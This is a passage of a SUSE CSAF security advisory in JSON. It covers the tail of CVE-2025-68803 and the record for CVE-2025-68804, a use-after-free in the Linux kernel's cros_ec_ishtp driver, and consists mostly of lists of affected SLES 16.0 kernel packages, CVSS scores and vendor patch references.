"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
